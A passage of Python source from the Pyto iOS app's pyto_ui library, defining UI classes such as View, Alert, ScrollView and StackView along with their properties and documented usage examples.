def style(self) -> BUTTON_ITEM_STYLE:
"""
The button item style. See `Button Item Style <constants.html#button-item-style>`_ constants for possible values.
:rtype: `Button Item Style <constants.html#button-item-style>`_
"""
return self.__py_item__.style
@style.setter
def style(self, new_value: BUTTON_ITEM_STYLE):
self.__py_item__.style = new_value
@property
def action(self) -> Callable[[ButtonItem], None]:
"""
A function called when the button item is pressed. Takes the button item as parameter.
:rtype: Callable[[ButtonItem], None]
"""
action = self.__py_item__.action
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@action.setter
def action(self, new_value: Callable[[ButtonItem], None]):
if new_value is None:
self.__py_item__.action = None
else:
self.__py_item__.action = _values.value(new_value)
# MARK: - Padding
class Padding:
"""
Padding with custom values.
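Example (a sketch; the ``padding`` property is exposed by :class:`~pyto_ui.StackView`):
.. highlight:: python
.. code-block:: python
    import pyto_ui as ui
    stack = ui.VerticalStackView()
    stack.padding = ui.Padding(top=8, bottom=8, left=16, right=16)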
"""
top: float = None
""" Top padding """
bottom: float = None
""" Bottom padding """
left: float = None
""" Left padding """
right: float = None
""" Right padding """
def __init__(
self, top: float = 0, bottom: float = 0, left: float = 0, right: float = 0
):
self.top = top
self.bottom = bottom
self.left = left
self.right = right
if "widget" not in os.environ:
# MARK: - Alert
class Alert:
"""
A class representing an alert.
Example:
.. highlight:: python
.. code-block:: python
from pyto_ui import Alert
alert = Alert("Hello", "Hello World!")
alert.add_action("Ok")
alert.add_cancel_action("Cancel")
if (alert.show() == "Ok"):
print("Good Bye!")
"""
__pyAlert__ = None
def __init__(self, title: str, message: str):
"""
Creates an alert.
:param title: The title of the alert.
:param message: The message of the alert.
"""
self.__pyAlert__ = __PyAlert__.alloc().init()
self.__pyAlert__.title = title
self.__pyAlert__.message = message
__actions__ = []
def add_action(self, title: str):
"""
Adds an action with given title.
:param title: The title of the action.
"""
self.__pyAlert__.addAction(title)
def add_destructive_action(self, title: str):
"""
Adds a destructive action with given title.
:param title: The title of the action.
"""
self.__pyAlert__.addDestructiveAction(title)
def add_cancel_action(self, title: str):
"""
Adds a cancel action with given title. Can only be added once.
:param title: The title of the action.
"""
if not self.__pyAlert__.addCancelAction(title):
raise ValueError("There is already a cancel action.")
def show(self) -> str:
"""
Shows alert.
Returns the title of the selected action.
:rtype: str
"""
script_path = None
try:
script_path = threading.current_thread().script_path
except AttributeError:
pass
return self.__pyAlert__._show(script_path)
######################
# MARK: - View Classes
######################
class View:
"""
An object that manages the content for a rectangular area on the screen.
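Example (a minimal sketch):
.. highlight:: python
.. code-block:: python
    import pyto_ui as ui
    view = ui.View()
    view.background_color = ui.COLOR_SYSTEM_BACKGROUND
    view.title = "My View"
    ui.show_view(view)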
"""
__py_view__ = None
_parent = None
def _get(self, key, _dict, default=None):
try:
return _dict[key]
except KeyError:
return default
def configure_from_dictionary(self, dictionary):
if self.__py_view__ is None:
self.__init__()
def get(key, _dict=dictionary, default=None):
return self._get(key, _dict, default)
if "connections" in dictionary:
def _get_connections(key, default=None):
return get(key, _dict=dictionary["connections"], default=default)
self._get_function = _get_connections
self.name = get("name")
if get("frame") is not None:
self.frame = tuple(get("frame"))
if get("size") is not None:
self.size = tuple(get("size"))
topbar = get("topbar")
if topbar is not None:
hidden = get("hidden", topbar, False)
title = get("title", topbar)
self.navigation_bar_hidden = hidden
self.title = title
self.flex = get("flex", default=[])
subviews = get("children", default=[])
for view in subviews:
if view == "Spacer":
if not isinstance(self, StackView):
raise NotImplementedError("Spacers can only have a 'StackView' instance as their super view.")
self.add_subview(_StackSpacerView())
elif isinstance(view, View):
view._parent = self
view._decode_functions()
self.add_subview(view)
else:
view = _from_json(view)
view._parent = self
view._decode_functions()
self.add_subview(view)
self.hidden = get("hidden", default=False)
self.alpha = get("alpha", default=1)
self.opaque = get("opaque", default=False)
if get("background_color") is not None:
bg_color = Color.__new__(Color)
bg_color.configure_from_dictionary(get("background_color"))
self.background_color = bg_color
if get("tint_color") is not None:
tint_color = Color.__new__(Color)
tint_color.configure_from_dictionary(get("tint_color"))
self.tint_color = tint_color
self.user_interaction_enabled = get("user_interaction", default=True)
self.clips_to_bounds = get("clips_to_bounds", default=False)
self.corner_radius = get("corner_radius", default=0)
self.border_width = get("border_width", default=0)
if get("border_color") is not None:
border_color = Color.__new__(Color)
border_color.configure_from_dictionary(get("border_color"))
self.border_color = border_color
if get("content_mode") is not None:
content_mode = ("content_mode_"+get("content_mode")).upper()
self.content_mode = globals()[content_mode]
if get("appearance") is not None:
appearance = ("appearance_"+get("appearance")).upper()
self.appearance = globals()[appearance]
button_items = []
if get("button_items") is not None:
for item in get("button_items"):
b_item = ButtonItem()
b_item._parent = self
b_item.configure_from_dictionary(item)
button_items.append(b_item)
self.button_items = button_items
self._decode_functions()
_get_function = None
def _decode_functions(self):
get = self._get_function
if get is None:
return
for name in dir(self):
try:
func = getattr(self.__class__, name)
if not isinstance(func, property):
continue
func = func.fget
sig = signature(func)
if sig.return_annotation.startswith("Callable[") and get(name) is not None:
try:
setattr(self, name, eval(get(name), sys.modules["__main__"].__dict__, locals()))
except NameError:
def try_with_parent(parent):
if get(name) in dir(parent):
return getattr(parent, get(name))
elif parent._parent is not None:
return try_with_parent(parent._parent)
else:
return None
setattr(self, name, try_with_parent(self))
except AttributeError:
continue
def dictionary_representation(self) -> dict:
subviews = []
for view in self.subviews:
if isinstance(view, _StackSpacerView):
subviews.append("Spacer")
else:
subviews.append(view.dictionary_representation())
bg_color = self.background_color
if bg_color is not None:
bg_color = bg_color.dictionary_representation()
tint_color = self.tint_color
if tint_color is not None and self._set_tint_color:
tint_color = tint_color.dictionary_representation()
border_color = self.border_color
if border_color is not None:
border_color = border_color.dictionary_representation()
content_mode = None
for key in list(globals().keys()).copy():
if key.startswith("CONTENT_MODE_") and globals()[key] == self.content_mode:
content_mode = key.lower().split("content_mode_")[1]
if self.appearance == APPEARANCE_DARK and self._set_appearance:
appearance = "dark"
elif self.appearance == APPEARANCE_LIGHT and self._set_appearance:
appearance = "light"
else:
appearance = None
button_items = []
for item in self.button_items:
button_items.append(item.dictionary_representation())
d = {
"class": ".".join([self.__class__.__module__, self.__class__.__name__]),
"name": self.name,
"frame": self.frame,
"topbar": {
"hidden": self.navigation_bar_hidden,
"title": self.title
},
"flex": self.flex,
"children": subviews,
"hidden": self.hidden,
"alpha": self.alpha,
"opaque": self.opaque,
"background_color": bg_color,
"tint_color": tint_color,
"user_interaction": self.user_interaction_enabled,
"clips_to_bounds": self.clips_to_bounds,
"corner_radius": self.corner_radius,
"border_width": self.border_width,
"border_color": border_color,
"content_mode": content_mode,
"appearance": appearance,
"button_items": button_items
}
for name in dir(self):
try:
func = getattr(self.__class__, name)
if not isinstance(func, property):
continue
func = func.fget
sig = signature(func)
if sig.return_annotation.startswith("Callable["):
value = getattr(self, name)
if callable(value) and "__self__" in dir(value) and value.__self__ == self:
d[name] = "self."+value.__name__
except AttributeError:
continue
return d
def _setup_subclass(self):
if callable(self.layout):
self.__py_view__.layoutAction = _values.value(self.layout)
if callable(self.did_appear):
self.__py_view__.appearAction = _values.value(self.did_appear)
if callable(self.did_disappear):
self.__py_view__.disappearAction = _values.value(self.did_disappear)
def __init__(self):
self.__py_view__ = __PyView__.newView()
self._setup_subclass()
def __repr__(self):
return "<"+self.__class__.__module__+"."+self.__class__.__name__+" "+str(self.__py_view__.managed.description)+">"
def __getitem__(self, item):
return self.subview_with_name(item)
def __del__(self):
try:
if self.__py_view__.references == 1:
_gc.collected.append(self.__py_view__)
elif self.__py_view__ not in _gc.collected:
self.__py_view__.releaseReference()
self.__py_view__.release()
except (AttributeError, ValueError):
pass
def __setattr__(self, name, value):
if name == "__py_view__":
previous = self.__py_view__
if previous is not None and previous.references == 1:
previous.releaseReference()
previous.release()
elif previous is not None:
if previous not in _gc.collected:
_gc.collected.append(previous)
if value is not None:
value.retainReference()
if isinstance(self, TableView) or isinstance(self, StackView):
value.retain()
super().__setattr__(name, value)
@property
def title(self) -> str:
"""
If this view is directly presented, the top bar will show this view's title.
:rtype: str
"""
title = self.__py_view__.title
if title is None:
return title
else:
return str(title)
@title.setter
def title(self, new_value: str):
self.__py_view__.title = new_value
@property
def name(self) -> str:
"""
The name identifying the view. To access a subview by its name, you can use the :func:`~pyto_ui.View.subview_with_name` function. :class:`~pyto_ui.View` is also subscriptable, so you can do something like this:
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
button = ui.Button()
button.name = "Button"
view = ui.View()
view.add_subview(button)
view["Button"] # -> Button object
:rtype: str
"""
name = self.__py_view__.name
if name is None:
return name
else:
return str(name)
@name.setter
def name(self, new_value: str):
self.__py_view__.name = new_value
def close(self):
"""
Closes the view, if the receiver object is the root view presented to the user.
"""
self.__py_view__.close()
def push(self, view: View):
"""
Presents the given additional view on top of the receiver.
:param view: The view to present.
"""
self.__py_view__.pushView(view.__py_view__)
def pop(self):
"""
Pops the visible view controller from the navigation controller.
"""
self.__py_view__.pop()
@property
def navigation_bar_hidden(self) -> bool:
"""
A boolean indicating whether the Navigation Bar of the View should be hidden.
:rtype: bool
"""
return self.__py_view__.navigationBarHidden
@navigation_bar_hidden.setter
def navigation_bar_hidden(self, new_value: bool):
self.__py_view__.navigationBarHidden = new_value
@property
def x(self) -> float:
"""
The x-coordinate of the view.
:rtype: float
"""
return self.__py_view__.x
@x.setter
def x(self, new_value: float):
self.__py_view__.x = new_value
@property
def y(self) -> float:
"""
The y-coordinate of the point.
:rtype: float
"""
return self.__py_view__.y
@y.setter
def y(self, new_value: float):
self.__py_view__.y = new_value
@property
def width(self) -> float:
"""
The width of the view.
:rtype: float
"""
return self.__py_view__.width
@width.setter
def width(self, new_value: float):
self.__py_view__.width = new_value
@property
def height(self) -> float:
"""
The height of the view.
:rtype: float
"""
return self.__py_view__.height
@height.setter
def height(self, new_value: float):
self.__py_view__.height = new_value
@property
def center_x(self) -> float:
"""
The center x-coordinate of the view's frame rectangle. Setting this value updates the ``frame`` property appropriately.
:rtype: float
"""
return self.__py_view__.centerX
@center_x.setter
def center_x(self, new_value: float):
self.__py_view__.centerX = new_value
@property
def center_y(self) -> float:
"""
The center y-coordinate of the view's frame rectangle. Setting this value updates the ``frame`` property appropriately.
:rtype: float
"""
return self.__py_view__.centerY
@center_y.setter
def center_y(self, new_value: float):
self.__py_view__.centerY = new_value
@property
def center(self) -> Tuple[float, float]:
"""
The center point of the view's frame rectangle. Setting this value updates the ``frame`` property appropriately.
This value is a tuple with X and Y coordinates.
:rtype: Tuple[float, float]
"""
return (self.center_x, self.center_y)
@center.setter
def center(self, new_value: Tuple[float, float]):
self.center_x, self.center_y = new_value
@property
def size(self) -> Tuple[float, float]:
"""
A size that specifies the height and width of the rectangle.
This value is a tuple with height and width values.
:rtype: Tuple[float, float]
"""
return (self.width, self.height)
@size.setter
def size(self, new_value: Tuple[float, float]):
self.width, self.height = new_value
@property
def origin(self) -> Tuple[float, float]:
"""
A point that specifies the coordinates of the origin of the view's frame rectangle.
This value is a tuple with X and Y coordinates.
:rtype: Tuple[float, float]
"""
return (self.x, self.y)
@origin.setter
def origin(self, new_value: Tuple[float, float]):
self.x, self.y = new_value
@property
def frame(self) -> Tuple[float, float, float, float]:
"""
The frame rectangle, which describes the view’s location and size in its superview’s coordinate system.
This value is a tuple with X, Y, Width and Height values.
:rtype: Tuple[float, float, float, float]
"""
return (self.x, self.y, self.width, self.height)
@frame.setter
def frame(self, new_value: Tuple[float, float, float, float]):
self.x, self.y, self.width, self.height = new_value
@property
def __flexible_width__(self) -> bool:
return self.__py_view__.flexibleWidth
@__flexible_width__.setter
def __flexible_width__(self, new_value: bool):
self.__py_view__.flexibleWidth = new_value
@property
def __flexible_height__(self) -> bool:
return self.__py_view__.flexibleHeight
@__flexible_height__.setter
def __flexible_height__(self, new_value: bool):
self.__py_view__.flexibleHeight = new_value
@property
def __flexible_left_margin__(self) -> bool:
return self.__py_view__.flexibleLeftMargin
@__flexible_left_margin__.setter
def __flexible_left_margin__(self, new_value: bool):
self.__py_view__.flexibleLeftMargin = new_value
@property
def __flexible_right_margin__(self) -> bool:
return self.__py_view__.flexibleRightMargin
@__flexible_right_margin__.setter
def __flexible_right_margin__(self, new_value: bool):
self.__py_view__.flexibleRightMargin = new_value
@property
def __flexible_top_margin__(self) -> bool:
return self.__py_view__.flexibleTopMargin
@__flexible_top_margin__.setter
def __flexible_top_margin__(self, new_value: bool):
self.__py_view__.flexibleTopMargin = new_value
@property
def __flexible_bottom_margin__(self) -> bool:
return self.__py_view__.flexibleBottomMargin
@__flexible_bottom_margin__.setter
def __flexible_bottom_margin__(self, new_value: bool):
self.__py_view__.flexibleBottomMargin = new_value
@property
def flex(self) -> List[AUTO_RESIZING]:
"""
A list that determines how the receiver resizes itself when its superview’s bounds change. See `Auto Resizing <constants.html#auto-resizing>`_ constants for possible values.
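Example (a sketch; ``bar`` stands for any subview):
.. highlight:: python
.. code-block:: python
    # Stick to the bottom of the superview and match its width.
    bar.flex = [ui.FLEXIBLE_WIDTH, ui.FLEXIBLE_TOP_MARGIN]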
:rtype: List[`Auto Resizing <constants.html#auto-resizing>`_]
"""
a = []
if self.__flexible_width__:
a.append(FLEXIBLE_WIDTH)
if self.__flexible_height__:
a.append(FLEXIBLE_HEIGHT)
if self.__flexible_bottom_margin__:
a.append(FLEXIBLE_BOTTOM_MARGIN)
if self.__flexible_top_margin__:
a.append(FLEXIBLE_TOP_MARGIN)
if self.__flexible_left_margin__:
a.append(FLEXIBLE_LEFT_MARGIN)
if self.__flexible_right_margin__:
a.append(FLEXIBLE_RIGHT_MARGIN)
return a
@flex.setter
def flex(self, new_value: List[AUTO_RESIZING]):
(
self.__flexible_width__,
self.__flexible_height__,
self.__flexible_top_margin__,
self.__flexible_bottom_margin__,
self.__flexible_left_margin__,
self.__flexible_right_margin__,
) = (
(FLEXIBLE_WIDTH in new_value),
(FLEXIBLE_HEIGHT in new_value),
(FLEXIBLE_TOP_MARGIN in new_value),
(FLEXIBLE_BOTTOM_MARGIN in new_value),
(FLEXIBLE_LEFT_MARGIN in new_value),
(FLEXIBLE_RIGHT_MARGIN in new_value),
)
def subview_with_name(self, name) -> View:
"""
Returns the subview with the given name. This function searches through all of the subviews recursively.
Raises ``NameError`` if no view is found.
:rtype: View
"""
def search_in_view(subview):
for view in subview.subviews:
if view.name == name:
return view
# Recurse into every child; the previous code only descended into the first one.
for view in subview.subviews:
found = search_in_view(view)
if found is not None:
return found
view = search_in_view(self)
if view is not None:
return view
raise NameError(f"No subview named '{name}'")
@property
def subviews(self) -> List[View]:
"""
(Read Only) A list of the view's children.
See also :func:`~pyto_ui.View.add_subview`.
:rtype: List[View]
"""
views = self.__py_view__.subviews
if views is None or len(views) == 0:
return []
else:
_views = []
for view in views:
try:
ui = sys.modules["pyto_ui"]
except KeyError:
import pyto_ui as ui
_class = getattr(ui, str(view.objc_class.pythonName))
_view = _class()
_view.__py_view__ = view
_views.append(_view)
return _views
@property
def superview(self) -> View:
"""
(Read Only) The parent view containing the receiver view.
:rtype: View
"""
superview = self.__py_view__.superView
if superview is None:
return None
else:
try:
ui = sys.modules["pyto_ui"]
except KeyError:
import pyto_ui as ui
_class = getattr(ui, str(superview.objc_class.pythonName))
view = _class()
view.__py_view__ = superview
return view
@property
def background_color(self) -> Color:
"""
The background color of the view.
:rtype: pyto_ui.Color
"""
c = self.__py_view__.backgroundColor
if c is None:
return None
else:
return Color(c)
@background_color.setter
def background_color(self, new_value: Color):
if new_value is None:
self.__py_view__.backgroundColor = None
else:
self.__py_view__.backgroundColor = new_value.__py_color__
@property
def hidden(self) -> bool:
"""
A boolean indicating whether the view is hidden.
:rtype: bool
"""
return self.__py_view__.hidden
@hidden.setter
def hidden(self, new_value: bool):
self.__py_view__.hidden = new_value
@property
def alpha(self) -> float:
"""
The opacity of the view.
:rtype: float
"""
return self.__py_view__.alpha
@alpha.setter
def alpha(self, new_value: float):
self.__py_view__.alpha = new_value
@property
def opaque(self) -> bool:
"""
A boolean indicating whether the view is opaque. Setting it to ``True`` should prevent the view from having a transparent background.
:rtype: bool
"""
return self.__py_view__.opaque
@opaque.setter
def opaque(self, new_value: bool):
self.__py_view__.opaque = new_value
_set_tint_color = False
@property
def tint_color(self) -> Color:
"""
The tint color of the view. If set to ``None``, the tint color will be inherited from the superview. The tint color affects some views like ``Button`` for title color, ``TextView`` for cursor color, etc.
:rtype: pyto_ui.Color
"""
c = self.__py_view__.tintColor
if c is None:
return None
else:
return Color(c)
@tint_color.setter
def tint_color(self, new_value: Color):
if new_value is None:
self.__py_view__.tintColor = None
self._set_tint_color = False
else:
self.__py_view__.tintColor = new_value.__py_color__
self._set_tint_color = True
@property
def user_interaction_enabled(self) -> bool:
"""
A boolean indicating whether the view responds to touches.
:rtype: bool
"""
return self.__py_view__.userInteractionEnabled
@user_interaction_enabled.setter
def user_interaction_enabled(self, new_value: bool):
self.__py_view__.userInteractionEnabled = new_value
@property
def clips_to_bounds(self) -> bool:
"""
A boolean value that determines whether subviews are confined to the bounds of the view.
:rtype: bool
"""
return self.__py_view__.clipsToBounds
@clips_to_bounds.setter
def clips_to_bounds(self, new_value: bool):
self.__py_view__.clipsToBounds = new_value
@property
def corner_radius(self) -> float:
"""
The radius to use when drawing rounded corners for the view’s background.
:rtype: float
"""
return self.__py_view__.cornerRadius
@corner_radius.setter
def corner_radius(self, new_value: float):
self.__py_view__.cornerRadius = new_value
@property
def border_width(self) -> float:
"""
The width of the view's border.
:rtype: float
"""
return self.__py_view__.borderWidth
@border_width.setter
def border_width(self, new_value: float):
self.__py_view__.borderWidth = new_value
@property
def border_color(self) -> Color:
"""
The color of the view's border.
:rtype: pyto_ui.Color
"""
c = self.__py_view__.borderColor
if c is None:
return None
else:
return Color(c)
@border_color.setter
def border_color(self, new_value: Color):
if new_value is None:
self.__py_view__.borderColor = None
else:
self.__py_view__.borderColor = new_value.__py_color__
@property
def content_mode(self) -> CONTENT_MODE:
"""
A flag used to determine how a view lays out its content when its bounds change.
See `Content Mode <constants.html#content-mode>`_ constants for possible values.
:rtype: `Content Mode <constants.html#content-mode>`_
"""
return self.__py_view__.contentMode
@content_mode.setter
def content_mode(self, new_value: CONTENT_MODE):
self.__py_view__.contentMode = new_value
@property
def appearance(self) -> APPEARANCE:
"""
The appearance of the view.
See `Appearance <constants.html#appearance>`_ constants for possible values.
:rtype: `Appearance <constants.html#appearance>`_
"""
return self.__py_view__.appearance
_set_appearance = False
@appearance.setter
def appearance(self, new_value: APPEARANCE):
self._set_appearance = (new_value != APPEARANCE_UNSPECIFIED)
self.__py_view__.appearance = new_value
@property
def first_responder(self) -> bool:
"""
(Read Only) A boolean indicating whether the view is the first responder.
``UIKit`` dispatches some types of events, such as motion events, to the first responder initially.
:rtype: bool
"""
return self.__py_view__.firstResponder
def add_subview(self, view: View):
"""
Adds the given view to the receiver's hierarchy.
:param view: The view to add.
"""
self.__py_view__.addSubview(view.__py_view__)
def insert_subview(self, view: View, index: int):
"""
Inserts the given view to the receiver's hierarchy at the given index.
:param view: The view to insert.
:param index: The index where the view should be inserted.
"""
self.__py_view__.insertSubview(view.__py_view__, at=index)
def insert_subview_below(self, view: View, below_view: View):
"""
Inserts the given view to the receiver's hierarchy below another given view.
:param view: The view to insert.
:param below_view: The view above the inserted view.
"""
self.__py_view__.insertSubview(view.__py_view__, below=below_view.__py_view__)
def insert_subview_above(self, view: View, above_view: View):
"""
Inserts the given view to the receiver's hierarchy above another given view.
:param view: The view to insert.
:param above_view: The view below the inserted view.
"""
self.__py_view__.insertSubview(view.__py_view__, above=above_view.__py_view__)
def remove_from_superview(self):
"""
Removes the view from the parent's hierarchy.
"""
self.__py_view__.removeFromSuperview()
def add_gesture_recognizer(self, gesture_recognizer: GestureRecognizer):
"""
Adds a gesture recognizer.
:param gesture_recognizer: The gesture recognizer to be added.
"""
self.__py_view__.addGestureRecognizer(gesture_recognizer.__py_gesture__)
def remove_gesture_recognizer(self, gesture_recognizer: GestureRecognizer):
"""
Removes a gesture recognizer.
:param gesture_recognizer: The gesture recognizer to be removed.
"""
self.__py_view__.removeGestureRecognizer(gesture_recognizer.__py_gesture__)
@property
def gesture_recognizers(self) -> List[GestureRecognizer]:
"""
(Read Only) Returns all gesture recognizers.
See :meth:`~pyto_ui.View.add_gesture_recognizer`.
:rtype: List[GestureRecognizer]
"""
recognizers = self.__py_view__.gestureRecognizers
if recognizers is None or len(recognizers) == 0:
return []
else:
_recognizers = []
for recognizer in recognizers:
_recognizer = GestureRecognizer(GESTURE_TYPE_TAP)
_recognizer.__py_gesture__ = recognizer
_recognizers.append(_recognizer)
return _recognizers
def size_to_fit(self):
"""
Sizes the view to fit its content.
"""
self.__py_view__.sizeToFit()
def become_first_responder(self) -> bool:
"""
Becomes the first responder. On :class:`~pyto_ui.TextView` and :class:`~pyto_ui.TextField` objects, the keyboard will be shown.
Returns a boolean indicating the success.
:rtype: bool
"""
return self.__py_view__.becomeFirstResponder()
def resign_first_responder(self) -> bool:
"""
Stops being the first responder. On :class:`~pyto_ui.TextView` and :class:`~pyto_ui.TextField` objects, the keyboard will be hidden.
Returns a boolean indicating the success.
:rtype: bool
"""
return self.__py_view__.resignFirstResponder()
@property
def layout(self) -> Callable[[View], None]:
"""
A function called when the view is resized. Takes the view as parameter.
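Example (a sketch; ``container`` stands for any view whose children should track its width):
.. highlight:: python
.. code-block:: python
    def layout(view):
        for subview in view.subviews:
            subview.width = view.width
    container.layout = layout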
:rtype: Callable[[View], None]
"""
action = self.__py_view__.layoutAction
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@layout.setter
def layout(self, new_value: Callable[[View], None]):
self.__py_view__.pyValue = _values.value(self)
if new_value is None:
self.__py_view__.layoutAction = None
else:
self.__py_view__.layoutAction = _values.value(new_value)
@property
def did_appear(self) -> Callable[[View], None]:
"""
A function called when the view appears on screen. This function is called only for the presented view, not its subviews.
:rtype: Callable[[View], None]
"""
action = self.__py_view__.appearAction
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_appear.setter
def did_appear(self, new_value: Callable[[View], None]):
self.__py_view__.pyValue = _values.value(self)
if new_value is None:
self.__py_view__.appearAction = None
else:
self.__py_view__.appearAction = _values.value(new_value)
@property
def did_disappear(self) -> Callable[[View], None]:
"""
A function called when the view stops being visible on screen. This function is called only for the presented view, not its subviews.
:rtype: Callable[[View], None]
"""
action = self.__py_view__.disappearAction
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_disappear.setter
def did_disappear(self, new_value: Callable[[View], None]):
self.__py_view__.pyValue = _values.value(self)
if new_value is None:
self.__py_view__.disappearAction = None
else:
self.__py_view__.disappearAction = _values.value(new_value)
@property
def button_items(self) -> List[ButtonItem]:
"""
A list of :class:`~pyto_ui.ButtonItem` objects to be displayed on the top bar. Works only if the view is the root view presented with :func:`~pyto_ui.show_view` or :meth:`~pyto_ui.View.push`.
:rtype: List[ButtonItem]
"""
items = self.__py_view__.buttonItems
if items is None or len(items) == 0:
return []
else:
_items = []
for item in items:
_item = ButtonItem()
_item.managed = item
_items.append(_item)
return _items
@button_items.setter
def button_items(self, new_value: List[ButtonItem]):
items = []
if new_value is not None and len(new_value) > 0:
for item in new_value:
items.append(item.__py_item__)
self.__py_view__.buttonItems = items
class UIKitView(View):
"""
This class is used to create a PytoUI view from a UIKit view. This class must be subclassed and must implement :meth:`~pyto_ui.UIKitView.make_view`.
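Example (a sketch; assumes Rubicon's ``ObjCClass`` is available for bridging UIKit classes, as it is in Pyto):
.. highlight:: python
.. code-block:: python
    import pyto_ui as ui
    from rubicon.objc import ObjCClass
    class Spinner(ui.UIKitView):
        def make_view(self):
            # Called on the main thread; must return a UIKit view.
            UIActivityIndicatorView = ObjCClass("UIActivityIndicatorView")
            spinner = UIActivityIndicatorView.alloc().init()
            spinner.startAnimating()
            return spinner
    ui.show_view(Spinner())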
"""
def __init__(self):
if type(self) is UIKitView:
msg = "'UIKitView' must be subclassed and implement 'make_view()'."
raise NotImplementedError(msg)
self._made_view = False
self._make_view()
while self.__py_view__ is None:
continue
def make_view(self) -> "UIView":
"""
Implement this method to return a UIKit view. This method is automatically called on the main thread.
:rtype: UIView
"""
return None
@mainthread
def _make_view(self):
view = self.make_view()
py_view = __PyUIKitView__.alloc().initWithManaged(view)
self.__py_view__ = py_view
self._setup_subclass()
class ScrollView(View):
"""
A view that allows the scrolling of its contained views.
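Example (a minimal sketch; note that content goes on ``content_view``, not on the Scroll View itself):
.. highlight:: python
.. code-block:: python
    import pyto_ui as ui
    scroll = ui.ScrollView()
    scroll.vertical = True
    scroll.content_height = 2000
    label = ui.Label("Scroll me")
    scroll.content_view.add_subview(label)
    ui.show_view(scroll)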
"""
_content_view = None
def configure_from_dictionary(self, dictionary):
super().configure_from_dictionary(dictionary)
def get(key, _dict=dictionary, default=None):
return self._get(key, _dict, default)
try:
dictionary = dictionary["ScrollView"]
except KeyError:
return
content = get("content")
if content is not None:
self.content_width = get("width", content)
self.content_height = get("height", content)
view = get("view", content)
if view is not None:
if isinstance(view, View):
view = view.dictionary_representation()
self.content_view._parent = self
self.content_view.configure_from_dictionary(view)
self.horizontal = get("horizontal", default=False)
self.vertical = get("vertical", default=False)
def dictionary_representation(self):
d = super().dictionary_representation()
scroll_view = {
"content": {
"width": self.content_width,
"height": self.content_height,
"view": self.content_view.dictionary_representation()
},
"vertical": self.vertical,
"horizontal": self.horizontal
}
d["ScrollView"] = scroll_view
return d
@property
def content_width(self) -> float:
"""
The horizontal size of the content. The value is used to calculate when the scroll view should stop scrolling horizontally.
The default value is ``None``, which means the content width will be equal to the width of the Scroll View.
:rtype: float
"""
return self.__py_view__.contentWidth
@content_width.setter
def content_width(self, new_value: float):
self.__py_view__.contentWidth = new_value
@property
def content_height(self) -> float:
"""
The vertical size of the content. The value is used to calculate when the scroll view should stop scrolling vertically.
The default value is ``None``, which means the content height will be equal to the height size of the Scroll View.
:rtype: float
"""
return self.__py_view__.contentHeight
@content_height.setter
def content_height(self, new_value: float):
self.__py_view__.contentHeight = new_value
@property
def vertical(self) -> bool:
"""
A boolean indicating whether the user can scroll vertically.
The default value is ``False``.
:rtype: bool
"""
return self.__py_view__.vertical
@vertical.setter
def vertical(self, new_value: bool):
self.__py_view__.vertical = new_value
@property
def horizontal(self) -> bool:
"""
A boolean indicating whether the user can scroll horizontally.
The default value is ``True``.
:rtype: bool
"""
return self.__py_view__.horizontal
@horizontal.setter
def horizontal(self, new_value: bool):
self.__py_view__.horizontal = new_value
@property
def content_view(self) -> View:
"""
(Read Only) This view is the content of the Scroll View.
You should add subviews here instead of adding them directly to the Scroll View.
"""
if self._content_view is not None:
return self._content_view
else:
view = View()
view.__py_view__ = self.__py_view__.content
self._content_view = view
return view
def __init__(self):
self.__py_view__ = __PyScrollView__.newView()
self._setup_subclass()
def add_subview(self, view):
super().add_subview(view)
msg = "Adding a subview to a ScrollView doesn't add it to the scrollable area. See 'ScrollView.content_view'."
warnings.warn(msg, UserWarning)
class _StackSpacerView(View):
def __init__(self):
self.__py_view__ = __PyStackSpacerView__.newView()
self._setup_subclass()
class StackView(View):
"""
A view that arranges its children in a horizontal or vertical line.
This is a base class for :class:`~pyto_ui.HorizontalStackView` and :class:`~pyto_ui.VerticalStackView`. You should use one of them instead of :class:`~pyto_ui.StackView`.
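Example (a minimal sketch):
.. highlight:: python
.. code-block:: python
    import pyto_ui as ui
    stack = ui.HorizontalStackView()
    stack.add_subview(ui.Label("Left"))
    stack.add_spacer()  # flexible space pushes the next view to the trailing edge
    stack.add_subview(ui.Label("Right"))
    ui.show_view(stack)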
"""
def __init__(self):
raise NotImplementedError("Cannot initialize a 'StackView'. Use 'HorizontalStackView' or 'VerticalStackView'.")
#def __del__(self):
# for view in self.subviews:
# view.remove_from_superview()
# super().__del__()
def configure_from_dictionary(self, dictionary):
super().configure_from_dictionary(dictionary)
try:
dictionary = dictionary["StackView"]
except KeyError:
return
if "padding" in dictionary and dictionary["padding"] is not None:
padding = dictionary["padding"]
self.padding = Padding(padding[0], padding[1], padding[2], padding[3])
def dictionary_representation(self):
d = super().dictionary_representation()
stack_view = {
"padding": [self.padding.top, self.padding.bottom, self.padding.left, self.padding.right]
}
d["StackView"] = stack_view
return d
def add_spacer(self):
"""
Adds a flexible space.
"""
self.add_subview(_StackSpacerView())
def insert_spacer(self, index: int):
"""
Inserts a flexible space at the given index.
:param index: The index where the view should be inserted.
"""
self.insert_subview(_StackSpacerView(), index)
def insert_spacer_before(self, before_view):
"""
Inserts a flexible space before the given view.
:param before_view: The view placed after the spacer.
"""
self.insert_subview_below(_StackSpacerView(), before_view)
def insert_spacer_after(self, after_view):
"""
Inserts a flexible space after the given view.
:param after_view: The view placed before the spacer.
"""
self.insert_subview_above(_StackSpacerView(), after_view)
@property
def padding(self) -> Padding:
"""
The padding of the view.
The default value is (0, 0, 0, 0).
:rtype: Padding
"""
padding = self.__py_view__.padding
return Padding(padding[0], padding[1], padding[2], padding[3])
@padding.setter
def padding(self, new_value: Padding):
self.__py_view__.padding = [new_value.top, new_value.bottom, new_value.left, new_value.right]
class HorizontalStackView(StackView):
"""
A view that arranges its children in a horizontal line.
"""
def __init__(self):
self.__py_view__ = __PyStackView__.horizontal()
self._setup_subclass()
class VerticalStackView(StackView):
"""
A view that arranges its children in a vertical line.
"""
def __init__(self):
self.__py_view__ = __PyStackView__.vertical()
self._setup_subclass()
class ImageView(View):
"""
A view displaying an image.
:param image: A PIL image.
:param symbol_name: An SF symbol name. See `sf_symbols <sf_symbols.html>`_
:param url: The URL of an image to load remotely.
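Example (a minimal sketch; "sun.max" is an arbitrary SF Symbols name):
.. highlight:: python
.. code-block:: python
    import pyto_ui as ui
    image_view = ui.ImageView(symbol_name="sun.max")
    image_view.size = (100, 100)
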